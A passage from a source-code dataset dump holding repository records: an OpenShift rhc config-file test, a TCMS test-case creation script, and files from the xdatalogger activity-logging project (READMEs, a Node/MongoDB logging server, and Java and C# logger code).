ssh key\", OSConf.get_sshkey)\n\n self.add_step(\"Setup config file (instead of rhc setup)\",\n '''echo -e \"libra_server=%s\\ndefault_rhlogin=%s\" > %s ''',\n function_parameters = [ self.get_instance_ip(),\n self.user_email, \n self.conf_file_path],\n expect_return=0)\n\n self.add_step(\"Check config file to test if default rhlogin is written\",\n \"cat %s\" %(self.conf_file_path),\n expect_str = [common.raw_str('default_rhlogin=%s' %(self.user_email))],\n expect_return = 0,\n expect_description = \"The file should contain `default_rhlogin` entry\")\n\n self.add_step(\"Change the default rhlogin in config file to %s\" %(self.test_rhlogin),\n \"echo 'default_rhlogin=%s' >%s\" %(self.test_rhlogin, self.conf_file_path),\n expect_return=0)\n\n self.add_step(\"Generate new ssh key file\",\n \"ssh-keygen -t rsa -f %s -N ''\" %(self.ssh_key_path),\n expect_return = 0)\n\n self.add_step(\"Modify %s to use the new ssh key\" %(self.conf_file_path),\n \"echo 'ssh_key_file=%s' >>%s\" %(self.ssh_key_path, self.conf_file_path),\n expect_return = 0)\n\n self.add_step(\"Update the default ssh key\",\n common.update_sshkey,\n function_parameters = [self.ssh_key_path + \".pub\",\n \"default\",\n self.user_email,\n self.user_passwd,\n \"--config %s\" %(self.conf_file_path)],\n expect_return=0)\n\n self.add_step(\"Get ssh key\", OSConf.get_sshkey)\n\n def compare_key(key1, key2):\n print \"Previous key fingerprint: %s\" %(key1)\n print \"New key fingerprint: %s\" %(key2)\n if key1 != key2:\n retcode = 12\n else:\n retcode = 0\n return retcode\n\n self.add_step(\"Compare key fingerprints\",\n compare_key,\n function_parameters=[\"__OUTPUT__[1][1]\", \"__OUTPUT__[8][1]\"],\n expect_return=12)\n\n test_libra_server = \"sldfkjasdlfkj\"\n self.add_step(\"Modify %s to use specified libra server\" %(self.conf_file_path),\n '''echo \"libra_server='%s'\" >>%s''' %(test_libra_server, self.conf_file_path),\n expect_return = 0)\n\n self.add_step(\"Run 'rhc domain show' to check libra server specifed in config file is being used\",\n \"rhc domain show -l %s -p '%s' --config %s -d %s\" % (self.user_email, self.user_passwd, self.conf_file_path, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_str = [\"https://%s\" % (test_libra_server)])\n\n self.run_steps()\n \n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SpecifyConfFile)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7837837934494019, "alphanum_fraction": 0.7837837934494019, "avg_line_length": 36, "blob_id": "2abc1cf00cd9a336e9bce1d72caafdd2ddfd78ce", "content_id": "10962a176f7d63243ebe6ab5d210363549876698", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "no_license", "max_line_length": 36, "num_lines": 1, "path": "/automation/parallel/atest/varfile.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "VALUE_FROM_VAR_FILE='Expected Value'\n" }, { "alpha_fraction": 0.5464940667152405, "alphanum_fraction": 0.5505933165550232, "avg_line_length": 35.496063232421875, "blob_id": "68304e0616b15147ba92c7fcf35668c9aaca52f3", "content_id": "0259dedaa8a6ebeffe9358fa441269b5b42bede0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4635, "license_type": "no_license", "max_line_length": 79, "num_lines": 127, "path": 
"/automation/example_test/scripts/casecreate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# casecreate.py is a script for case creating automatically\n# in TCMS via xml file\n#\n# Author: Xin Gao\n# Date: Dec 20, 2012\n#\n# If y don't know how to use this script, pls type following command,\n# python casecreate.py --help\n# If y have any other question, pls feel free to raise it to\n# [email protected]\n\n\nimport os\nimport sys\nfrom optparse import OptionParser\nimport xml.etree.ElementTree as ET\n\nfrom nitrate import NitrateKerbXmlrpc\n\n\ndef get_options():\n '''Setting up the run env and other parameters'''\n\n usage = '''usage: python %prog [-td] -p\n Example: python casecreate.py -t -p 7656 -d ~/plan/vaultcase.xml'''\n parser = OptionParser(usage)\n parser.add_option('-t', action='store_true', dest='is_test',\n help='create cases to tcms-stage. \\\n default is to production env.')\n parser.add_option('-p', '--plan_id', type='int', dest='plan_id',\n help='Plan id, this is a mandatory parameter!!!')\n parser.add_option('-d', '--directory', dest='xml_file',\n default=os.getcwd() + './testplan.xml',\n help='IEEE_TestPlan file path: \\\n such as, ~/plan/vaultcase.xml, \\\n default value is ./testplan.xml')\n (options, args) = parser.parse_args()\n is_test = options.is_test\n plan_id = options.plan_id\n xml_file = options.xml_file\n base_url = ''\n if is_test:\n base_url = 'https://tcms-stage.englab.bne.redhat.com'\n else:\n base_url = 'https://tcms.engineering.redhat.com'\n tcmsrpc = NitrateKerbXmlrpc(base_url + '/xmlrpc/').server\n if not plan_id:\n parser.error(\"'-p' is a mandatory parameter, and the type is 'int'!\")\n\n return tcmsrpc, plan_id, xml_file\n\n\ndef get_category_id(tcmsrpc, plan_id):\n '''Get the category_id of \"--default--\",\n\n if there's no \"--default--\" category,\n raise warning about adding \"--default--\" category'''\n product_name = tcmsrpc.TestPlan.get(plan_id)['product']\n try:\n category_id = tcmsrpc.Product.check_category('--default--',\n product_name)['id']\n except Exception, error_info:\n print error_info\n sys.exit(\"!!!!!'--default--' category does not exist!!!!!\\n \\\n pls add that category on web TCMS.\")\n\n return category_id\n\n\ndef get_cases(xml_file):\n '''Getting all cases info from xml file'''\n\n cases = []\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for testcase in root.findall('testcase'):\n case = {}\n case['summary'] = testcase.get('case_name')\n case['priority'] = testcase.get('case_priority')\n case['tag'] = testcase.get('case_tag')\n case['notes'] = testcase.find('notes').text\n case['action'] = testcase.find('action').text\n case['expectedresults'] = testcase.find('expectedresults').text\n case['setup'] = testcase.find('setup').text\n case['breakdown'] = testcase.find('breakdown').text\n cases.append(case)\n return cases\n\n\ndef create_cases(tcmsrpc, plan_id, cases):\n '''Create new cases'''\n # get category_id, and product_id\n category_id = get_category_id(tcmsrpc, plan_id)\n product_id = tcmsrpc.TestPlan.get(plan_id)['product_id']\n num = 0\n for case in cases:\n num += 1\n case_setup = case['notes'] + case['setup']\n case_value = {\n 'plan': plan_id,\n 'category': category_id,\n 'product': product_id,\n 'summary': case['summary'],\n 'priority': int(case['priority'][1]),\n 'tag': case['tag'],\n 'setup': '<pre>' + case_setup + '</pre>',\n 'action': '<pre>' + case['action'] + '</pre>',\n 'effect': '<pre>' + case['expectedresults'] + '</pre>',\n 'setup': '<pre>' + case_setup + '</pre>',\n 
'breakdown': '<pre>' + case['breakdown'] + '</pre>'}\n new_case = tcmsrpc.TestCase.create(case_value)\n case_id = new_case['case_id']\n print 'created case%d, case_id: %d, summary is: %s' \\\n % (num, case_id, case['summary'])\n\n\nif __name__ == '__main__':\n # Get env, plan_id, and xml file path\n (tcmsrpc, plan_id, xml_file) = get_options()\n\n # Get other case info for case creating\n cases = []\n cases = get_cases(xml_file)\n\n # create Cases via xml file\n create_cases(tcmsrpc, plan_id, cases)\n print '=' * 50, '\\n', 'DONE'.center(50, '='), '\\n', '=' * 50\n" } ]
502
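The `casecreate.py` entry above parses an "IEEE_TestPlan" XML file, and one detail is worth flagging: its `case_value` dict literal assigns the `'setup'` key twice, which is harmless in Python (the later assignment silently wins) but redundant. The sketch below reconstructs the XML shape that `get_cases()` evidently expects. The element and attribute names are taken directly from that parsing code; the root tag, the sample values, and the use of Python 3 (the original is Python 2) are assumptions.

```python
# Reconstruction of the plan-file shape consumed by get_cases() in
# casecreate.py above. Element and attribute names come from the parsing
# code; the root tag and all sample values are hypothetical.
import xml.etree.ElementTree as ET

SAMPLE_PLAN = """
<testplan>
  <testcase case_name="Verify login" case_priority="P1" case_tag="smoke">
    <notes>Requires a registered user.</notes>
    <setup>Open the login page.</setup>
    <action>Submit valid credentials.</action>
    <expectedresults>User lands on the dashboard.</expectedresults>
    <breakdown>Log out and close the browser.</breakdown>
  </testcase>
</testplan>
"""

root = ET.fromstring(SAMPLE_PLAN)
for testcase in root.findall('testcase'):
    # Attributes become summary/priority/tag; note that create_cases() later
    # derives the numeric priority via int(case['priority'][1]), so the
    # attribute must look like "P1", "P2", ...
    print(testcase.get('case_name'), testcase.get('case_priority'))
    print(testcase.find('action').text)
```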
draperlab/xdatalogger
https://github.com/draperlab/xdatalogger
2a1eecc613ace77e5bfaa412cca1e330f84b72b0
8be459602739fc591fe54dbc54950dd84c69b2ac
5c44f64f8189a9d18aa363ef4bac67d6945f6ea7
refs/heads/master
2021-01-25T04:02:09.690612
2014-06-25T19:16:39
2014-06-25T19:16:39
13988935
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.655940592288971, "alphanum_fraction": 0.6670792102813721, "avg_line_length": 20.864864349365234, "blob_id": "68e1f0f6d88fccbcf99c59b2610e697d5aeb30a5", "content_id": "aaeb0eaf315c57dd3dc1262347c30d1e8967f6c7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 808, "license_type": "permissive", "max_line_length": 89, "num_lines": 37, "path": "/examples/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "#Examples\n\nLoad `jstest.html` in any modern browser and open the console to view events being fired.\n\n### Instantiation and Registration\n```javascript\nvar ac = new activityLogger().echo(true).testing(true);\nac.registerActivityLogger('http://localhost:3000', 'demo', '0.1')\n```\n\n### Logging Method A\n```javascript\nd3.select(\"#order-cost\")\n.on(\"click\", function () {\n home.order = \"cost\";\n home.update();\n ac.logUserActivity(\"Reorder Bar Chart by Cost\", \"sort_data\", ac.WF_EXPLORE);\n});\n})\n```\n\n### Logging Method B\n```javascript\nac.tag('#sl1', {\n\tevents: ['mouseenter', 'mouseleave', 'change'],\n\twf_state: ac.WF_EXPLORE,\n\tactivity: 'select_option',\n\tdesc: 'User selected option from list'\n})\n```\n\n### Logging Method C\n```html\n<li class=\"dropdown draper\" data-wf='4' data-activity='select'>\n ...\n</li>\n```" }, { "alpha_fraction": 0.7307294607162476, "alphanum_fraction": 0.7364200949668884, "avg_line_length": 37.28712844848633, "blob_id": "cd90bfa422bbb1f27f739764e5be0180a91be6ad", "content_id": "c16f91b93a65e0884788c0a962c180a0b422c7dc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3866, "license_type": "permissive", "max_line_length": 262, "num_lines": 101, "path": "/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "# Draper XDATA Activity Logger\n\nThe Draper XDATA activity logger, is a collection of helper libraries for XDATA performers, to aid in recording the behaviors of the analysts using the tools.\n\n## JavaScript\n\n### Create Activity Logger Object\n\nThere should be 1 activityLogger per application. 
The activity logger object will maintain session specific information that will be logged to Draper's servers.\n\n\n```javascript\n// Standard\nvar ac = new activityLogger();\n\n// Echo logging in console\nvar ac = new activityLogger().echo(true);\n\n// Mute USER and SYS actions\nvar ac = new activityLogger().mute(['SYS', 'USER']);\n\n// Testing: will not contact Draper Server\nvar ac = new activityLogger().testing(true);\n\n// are chainable\nvar ac = new activityLogger().echo(true).testing(true);\n```\n\n### Register Logger\n\nRegistering the logger requires the logging server URL, the name of your component, and a component version to aid in differencing logs from components that are changed as they become more developed.\n\nRegistering with Draper's server is a blocking call, and ensures that a sessionID is registered with the logger.\n```javascript\nac.registerActivityLogger(\"http://localhost:3000\", \"KitwareHospitalCosts\", \"0.1\");\n```\n\n### Logging a USER Action\n\nA User action requires 3 elements.\n* A natural language description of the action\n* A one word action description that should be repeated across tool\n* A workflow state (more information below)\n\nThere are currently 3 methods available to log USER events, examples of each are shown below.\n\n#### Logging Method A\n```javascript\nd3.select(\"#order-cost\")\n.on(\"click\", function () {\n home.order = \"cost\";\n home.update();\n ac.logUserActivity(\"Reorder Bar Chart by Cost\", \"sort_data\", ac.WF_EXPLORE);\n});\n})\n```\n\n#### Logging Method B\n```javascript\nac.tag('#sl1', {\n\tevents: ['mouseenter', 'mouseleave', 'change'],\n\twf_state: ac.WF_EXPLORE,\n\tactivity: 'select_option',\n\tdesc: 'User selected option from list'\n})\n```\n\n#### Logging Method C\n```html\n<li class=\"dropdown draper\" data-wf='4' data-activity='select'>\n ...\n</li>\n```\n\n#### Workflow States\nThe following list contains the 7 workflow states we are interested in monitoring. Within each workflow state there are a set of actions we anticipate the users doing. Developers are welcome to create more if the action they wish to record is not in this list.\n\n0. **WF_OTHER** - The action does not correspond to any workflow state. Please contact Draper for guidance.\n1. **WF_DEFINE** - define_hypothesis\n2. **WF_GETDATA** - write_query, select_option, execute_query, monitor_query\n3. **WF_EXPLORE** - browse, pan, zoom, scale, rotate, filter, drill, select, crossfilter, scroll, read (including mouse popovers), listen (if audio), watch (if imagery / video), toggle_option, highlight, sort_data, select_data, down_select_data, filter_data\n4. **WF_CREATE** - create_visualization, define_axes, define_chart_type, define_table, move_window, resize_window, set_color_palette, select_layers, {add,remove,split,merge}_{rows,columns}, arrange_windows\n5. **WF_ENRICH** - add_note, bookmark_view, label\n6. **WF_TRANSFORM** - denoise, detrend, pattern_search, do_math, transform_data, coordinate_transform\n\n-------------\n\n### Logging a SYS Action\nThe logging of system actions are aimed to log those events that are not explicitly triggered by the user, as well as measure any latency in the system. \n\nFor example, when a user enters a query and hits submit, a USER action is fired. When the query results are returned 10s later, a SYS action should be fired to record that new data has arrived. 
\n\nAn example of this is below:\n```javascript\nac.logUserActivity(\"asking server for data\", \"execute_query\", ac.WF_GETDATA);\n\n$.getJSON('https://my_endpoint/get_data', data, function(data) {\n\tac.logSysActivity('received data from server');\n\t$(\"#result\").text(data.result);\n})\n```" }, { "alpha_fraction": 0.6552363038063049, "alphanum_fraction": 0.6997219920158386, "avg_line_length": 31.696969985961914, "blob_id": "94b665290571fca50b310a58e35c85ca56f95b4d", "content_id": "baa333550016fe2fb931a3eeced533f4aa2bbeae", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1079, "license_type": "permissive", "max_line_length": 95, "num_lines": 33, "path": "/java/ActivityLoggerTest.java", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport org.draper.ActivityLogger;\n\npublic class ActivityLoggerTest {\n\n\n\tpublic static void main(String [ ] args){\n\t\tActivityLogger ac = new ActivityLogger();\n\t\tac.registerActivityLogger(\"http://127.0.0.1:1337\");\n\n\t\tac.componentName = \"pyTestComp\";\n\t\tac.componentVersion = \"34.87\";\n\t\t//ac.echoLogsToConsole = true;\n\t\tHashtable<String, Object> meta1 = new Hashtable<String, Object>();\n\t\tmeta1.put(\"testQuant\", 3);\n\t\tmeta1.put(\"testQual\", \"quall\");\n\t\t\n\t\tfor(int i = 0; i<10; i++){\n\t\tac.logSystemActivity(\"TEST SYSTEM MESSAGE\");\n\t\tSystem.out.println();\n\t\tac.logSystemActivity(\"TEST SYSTEM MESSAGE\", meta1);\n\t\tSystem.out.println();\n\t\tac.logUserActivity(\"TEST USER MESSAGE\" , \"scaleHistogram\", ActivityLogger.WF.COLLABORATE);\n\t\tSystem.out.println();\n\t\tac.logUserActivity(\"TEST USER MESSAGE\" , \"scaleHistogram\", ActivityLogger.WF.MARSHAL, meta1);\n\t\tSystem.out.println();\n\t\tac.logUILayout(\"TEST UI LAYOUT\", \"Viz Element\", true, 200, 450, 200, 500);\n\t\tSystem.out.println();\n\t\tac.logUILayout(\"TEST UI LAYOUT\", \"Viz Element\", true, 200, 450, 200, 500, meta1);\n\t\t}\n\t}\n\n}\n" }, { "alpha_fraction": 0.7278106212615967, "alphanum_fraction": 0.7396449446678162, "avg_line_length": 29.772727966308594, "blob_id": "68873906272e074a9a4022b2e291841f5a1d0228", "content_id": "5acfb702e161738a82ddb3c6753a3506bf7d08a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 676, "license_type": "permissive", "max_line_length": 161, "num_lines": 22, "path": "/server/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "#Draper Logging Server\n\nThe Draper Logging Server is a lightweight Node.js server written using the Express.js package. There are some dependencies, including optimist.js and mongo.js.\n\n\n## Quick Start\n\n The quickest way to get started with the Draper Logging server is to execute `server` as shown below:\n\nInstall dependencies:\n\n $ npm install\n\n Start the server:\n \n $ node server.js\n\n## Details\n\n * By default runs on 0.0.0.0:1337, port can be altered by using the --port flag\n * Expects to already have `mongod` running and will look for the db xdata by default, this can be altered by using the --host flag\n * Expects the mongo collection `logs` under the db." 
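The Draper Logging Server README above documents the two HTTP endpoints that `server.js` (which follows) implements: `GET /register` to obtain a session ID, and `POST /send_log` to store a log message in the `logs` Mongo collection. Below is a minimal sketch of a client round-trip, using only the Python 3 standard library rather than the repo's own helper, and assuming the server is reachable at the README's default port 1337 on localhost; the payload fields mirror those assembled by the repo's Python `ActivityLogger`.

```python
# Minimal client round-trip against the Draper Logging Server sketched
# above. Endpoint paths and response keys come from server.js; the host,
# component name, and log contents are hypothetical.
import json
import urllib.request
from datetime import datetime, timezone

BASE = "http://localhost:1337"  # assumes the README's default port

# GET /register hands back a session_id for subsequent log messages.
with urllib.request.urlopen(BASE + "/register") as resp:
    session = json.load(resp)

log = {
    "timestamp": datetime.now(timezone.utc).isoformat(),
    "client": "example-host",  # hypothetical client hostname
    "component": {"name": "exampleComponent", "version": "0.1"},
    "sessionID": session["session_id"],
    "type": "SYSACTION",
    "parms": {"desc": "Pushed query results to GUI"},
}

# POST /send_log stores the message in the `logs` collection.
req = urllib.request.Request(
    BASE + "/send_log",
    data=json.dumps(log).encode("utf-8"),
    headers={"Content-Type": "application/json"},
)
urllib.request.urlopen(req).close()
```

The server coerces `timestamp` with JavaScript's `new Date(...)` before inserting the document, so any ISO-8601 string is acceptable here.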
}, { "alpha_fraction": 0.6548625826835632, "alphanum_fraction": 0.6612050533294678, "avg_line_length": 22.073171615600586, "blob_id": "1c6e57bd6d500d4e280603cf03dc9af127227110", "content_id": "6f1fc78e8864728d209492c08c5af2dc51efdfed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1892, "license_type": "permissive", "max_line_length": 78, "num_lines": 82, "path": "/server/server.js", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "#!/usr/bin node\n/**\n* Draper Logging Server\n*\n* This is a simple lightweight server that handles the registration of logging\n* sessions and receives logs and passes them to a local MongoDB.\n*\n* @author Draper Laboratory\n* @date 2014\n*/\n\n/**\n * Module dependencies.\n */\nvar express = require('express');\nvar db = require(\"mongojs\");\nvar argv = require(\"optimist\").argv;\n\nvar host = \"xdata\",\nport = \"1337\";\n\nif (!!argv.host) {\n\thost = argv.host;\n}\nif (!!argv.port) {\n\tport = argv.port;\n}\n\n// MongoDB interface\nvar databaseUrl = \"xdata\"; // \"username:[email protected]/mydb\"\nvar collections = [\"logs\", \"sessions\"]\ndb = db.connect(databaseUrl, collections);\n\nvar app = express();\napp.use(express.bodyParser());\n\n// endpoint to receive logs\napp.post('/send_log', function(req, res){\n\tconsole.log('recieved log')\n\tvar data = req.body; \n console.log(data)\n data.timestamp = new Date(data.timestamp)\n console.log(data)\n db.logs.insert(data, function (err, result) {\n \n // Allow CORS\n var origin = (req.headers.origin || \"*\");\n res.header(\"Access-Control-Allow-Origin\", origin);\n res.json({}); \t\nres.end()\n });\n});\n\napp.get('/session', function(req, res){\n\tconsole.log('query:', req.query)\n});\n\n// endpoint to register session\napp.get('/register', function(req, res){\n\tconsole.log('registering session', req.connection.remoteAddress)\n\tvar client_ip = req.connection.remoteAddress\n var data = {client_ip: client_ip};\n\tconsole.log(data);\n db.sessions.insert(data, function (err, result) {\n \n // Allow CORS\n var origin = (req.headers.origin || \"*\");\n res.header(\"Access-Control-Allow-Origin\", origin);\n\n console.log(result, result._id)\n \tres.json({\n\t\t\tsession_id: result._id,\n\t\t\tclient_ip: req.connection.remoteAddress\n\t\t})\n res.end()\n\t}) \n});\n\n// run server\nvar serverAddress = '0.0.0.0';\napp.listen(+port, serverAddress);\nconsole.log('Listening on port ' + port);\n" }, { "alpha_fraction": 0.6046372056007385, "alphanum_fraction": 0.6085702776908875, "avg_line_length": 51.65483093261719, "blob_id": "a0092c5b17cf6c8d199dec90e92ed9cb29130405", "content_id": "049d61f4e9c237dfa87e4bb1f68827c91bcc03f9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 26699, "license_type": "permissive", "max_line_length": 233, "num_lines": 507, "path": "/csharp/ActivityLogger.cs", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\n\nnamespace Activity_Logging_API_Helper\n{\n /*\n\t * ++++++++++++++++++\n * C# Activity Logger\n * ++++++++++++++++++\n\t * \n\t * Draper Laboratory, June 2013\n\t * ----------------------------\n * \n\t * \n\t * This library is intended for integration into a C# software application which is implementing the Draper \n\t * Activity Logging API. To send activity log messages using this libary, components must:\n * \n\t * \t1. 
Instantiate an ``ActivityLogger`` object\n\t * \t2. Call ``registerActivityLogger(...)`` to pass in required networking \n\t * \t and version information.\n\t * \t3. Call one of the logging functions:\n\t * \t\t* ``logSystemActivity(...)``\n\t * \t\t* ``logUserActivity(...)``\n\t * \t\t* ``logUILayout(...)``\n\t * \n\t * An example use of this library is included below::\n * \n\t * \t //Instantiate the Activity Logger\n\t * \t ac = ActivityLogger.ActivityLogger();\n * \n * //Get the the current UTC time, and store it as an ISO-compliant timestamp string.\n * String ISOTime = DateTime.UtcNow.ToString(\"O\");\n * \n\t * \t //Minimally register the logger (DISCOURAGED). In this case, we register our logger with client hostname\n * \t //\"3D Viz Tablet 001\", which is the name of the hardware device on which this application is running.\n * \t //No other arguments are supplied, so the software component name will be logged as unknownComponent, the \n * \t //component version will be unknown,and the User Session ID will be a random integer.\n * \n * ac.registerActivityLogger(\"Viz_Tablet_001\");\n * \n * //Re-register the logger. In this case, we register our logger object with client hostname\n * \t //\"Viz_Tablet_001\". We specify that the application sending logs is version 34.87 of the application \n * \t //\"c-Sharp Test App\", and the User Session ID is \"AC34523452345\".\n * \t \n * c.registerActivityLogger(\"Viz_Tablet_001\", \"cSharpTestApp\", \"34.87\", \"AC34523452345\");\n * \n * //Send a System Activity Message. In this case, we send a System Activity message with the current UTC\n * //timestamp and the action description \"Pushed query results to GUI\"\n *\n * ac.logSystemActivity(ISOTime, \"Pushed query results to GUI\");\n * \n * //Send a System Activity Message with optional metadata included. In this case, we send a System Activity\n * //message with the current UTC timestamp, the action description \"Pushed query results to GUI\" and \n * //optional metadata with two key-value pairs of:\n * // 'rowsReturned'=314\n * // 'queryTime'='422 ms'\n * \n * Dictionary<String,String> testDict = new Dictionary<String, String>();\n * testDict.Add(\"rowsReturned\", \"314\");\n * testDict.Add(\"queryTime\", \"422 ms\");\n * ac.logSystemActivity(ISOTime, \"Pushed query results to GUI\", testDict);\n * \n * //Send a User Activity Message. In this case, we send a User Activity message with the current UTC \n * //timestamp, the action description \"Filtered results using a Histogram view\", a developer-defined user \n * //action visualFilter_Histogram, and the workflow constant SEARCH, defined in the Draper Activity Logging\n * //API.\n * \n * \t\tac.logUserActivity(ISOTime, \"Filtered results using a Histogram view\" , \"visualFilter_Histogram\", \n * \t\t ActivityLogger.WF.MARSHAL);\n * \t \n * //Send a UI Layout Message. In this case, we send a UI Layout message with the current UTC timestamp, \n * //action description of \"Expand Tree Node\". The name of the UI element is \"Cluster_Browser_List\", \n * //visibility=true, meaning SearchWindow A is currently visible. The left, right, top and bottom bounds of\n * //the UI element are 200px, 450px, 200px, and 500px from the top right of the screen.\n * \n * Console.Write(ac.logUILayout(ISOTime, \"Expand Tree Node\", \"Cluster_Browser_List\", true, 200, 450, 200, \n * 500)) ; \n */\n class ActivityLogger\n {\n /// <summary>\n /// The name of the computer or VM on which the software component using this library is runing. 
In the case of\n ///a server-side Python component, this should be the host name of the machine on which the Python service is\n ///running. By default, this field will be populated with the IP address of the machine on which this module is \n ///executed.\n ///\n ///Ideally, this hostname should describe a physical terminal or experimental setup as persistently as possible.\n /// </summary>\n String clientHostname;\n\n //The name of the software component or application sending log messages from this library. Defaults to \n //``unknownComponent``\n String componentName = \"unknownComponent\";\n\n //The version number of the software component or application specified in ``clientHostname`` that is sending log\n //messages from this library. Defaults to ``unknown``.\n String componentVersion = \"unknown\";\n\n //The unique session ID used for communication between client and sever-side software components during use of \n //this component. Defaults to a random integer.\n //\n //Ideally, this session ID will identify log messages from all software components used to execute a unique user \n //session.\n int sessionID;\n\n\n public ActivityLogger()\n {\n Random randomNumberGen = new Random();\n sessionID = randomNumberGen.Next(1, 10000);\n }\n\n /*\n INTERNAL CONSTANTS\n ******************\n * These constant define values associated with this specific version of this library, and should not be \n * changed by the implementor.\n */\n\n //The version number of the Draper Activity Logging API implemented by this library.\n private int apiVersion = 2;\n\n //The workflow coding version used by this Activity Logging API.\n private int workflowCodingVersion = 1;\n\n //WORKFLOW CODES\n\n //These constants specify the workflow codes defined in the Draper Activity Logging API version <apiVersion>. One of \n //these constants *must* be passed in the parameter ``userWorkflowState``\tin the function ``logUserActivity``. \n\n public enum WF\n {\n OTHER = 0,\n PLAN = 1,\n SEARCH = 2,\n EXAMINE = 3,\n MARSHAL = 4,\n REASON = 5,\n COLLABORATE = 6,\n REPORT = 7\n }\n\n //The language in which this helper library is implemented\n String implementationLanguage = \"C#\";\n\n // END INTERNAL CONSTANTS\n // **********************\n\n\n /*======================== REGISTRATION ============================\n * These variables are assigned by calling the \n * <registerActivityLogger> function below. They are persistent until\n * a new ActivityLogger object is instantiated, or until modification\n * by the <registerActivityLogger> function. \n */\n\n /// <summary>\n /// Register this event logger. <registerActivityLogger> MUST be called before log messages can be sent with \n /// this library. \n /// </summary>\n /// <param name=\"clientHostnameIN\">The hostname or IP address of this machine or VM. See documentation for\n /// <clientHostname> below. If not provided, defaults to the public IP address of this computer.</param>\n /// <param name=\"componentNameIN\">The name of the app or component using this library. See documentation for \n /// <componentName> below. If not provided, defaults to the hostname of the web app that loaded this \n /// library.</param>\n /// <param name=\"componentVersionIN\">The version of this app or component. See documentation for \n /// <componentVersion> below. If not provided, defaults to 'unknown'.</param>\n /// <param name=\"sessionIdIN\">A unique ID for the current user session. See documentation for <sessionID>\n /// below. 
If not provided, defaults to a random integer.</param>\n\n public void registerActivityLogger(String clientHostnameIN, String componentNameIN = null, String componentVersionIN = null,\n int sessionIdIN = -1)\n {\n if (componentNameIN != null)\n {\n componentName = componentNameIN;\n }\n\n\n if (componentVersionIN != null)\n {\n componentVersion = componentVersionIN;\n }\n\n if (sessionIdIN != -1)\n {\n sessionID = sessionIdIN;\n }\n\n clientHostname = clientHostnameIN;\n }\n\n //========================END REGISTRATION==========================\n\n\n /*==================ACTIVITY LOGGING FUNCTIONS======================\n * The 3 functions in this section are used to send Activity Log Mesages to an Activity Logging Server. \n * Seperate functions are used to log System Activity, User Activity, and UI Layout Events. See the Activity \n * Logging API by Draper Laboratory for more details about the use of these messages.\n */\n\n /// <summary>\n /// Log a System Activity, with nested metadata.\n /// </summary>\n /// <remarks> <see cref=\"registerActivityLogger\"/> **must** be called before calling this function. Use <code>logSystemActivity</code> to log \n /// software actions that are not explicitly invoked by the user. For example, if a software component refreshes a \n /// data store after a pre-determined time span, the refresh event should be logged as a system activity. However, \n /// if the datastore was refreshed in response to a user clicking a Reshresh UI element, that activity should NOT be\n /// logged as a System Activity, but rather as a User Activity, with the method <see cref=\"logUserActivity\"/>.\n /// </remarks>\n /// <param name=\"ISOTimestamp\">An ISO-compliant Timestamp string, in UTC.</param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView component refreshed datasource\"</example></param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <returns>A JSON message.</returns>\n public String logSystemActivity(String ISOTimestamp, String actionDescription, Dictionary<String, String> softwareMetadata = null)\n {\n Dictionary<String, object> recastMetaData = null;\n if (softwareMetadata != null)\n {\n recastMetaData = new Dictionary<string, object>();\n foreach (String key in softwareMetadata.Keys)\n {\n recastMetaData.Add(key, softwareMetadata[key]);\n }\n }\n\n return logSystemActivity<Object>(ISOTimestamp, actionDescription, recastMetaData);\n }\n /// <summary>\n /// Log a System Activity.\n /// </summary>\n /// <remarks> <see cref=\"registerActivityLogger\"/> **must** be called before calling this function. Use <code>logSystemActivity</code> to log \n /// software actions that are not explicitly invoked by the user. For example, if a software component refreshes a \n /// data store after a pre-determined time span, the refresh event should be logged as a system activity. However, \n /// if the datastore was refreshed in response to a user clicking a Reshresh UI element, that activity should NOT be\n /// logged as a System Activity, but rather as a User Activity, with the method <see cref=\"logUserActivity\"/>.\n /// </remarks>\n /// <param name=\"ISOTimestamp\">An ISO-compliant Timestamp string, in UTC.</param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. 
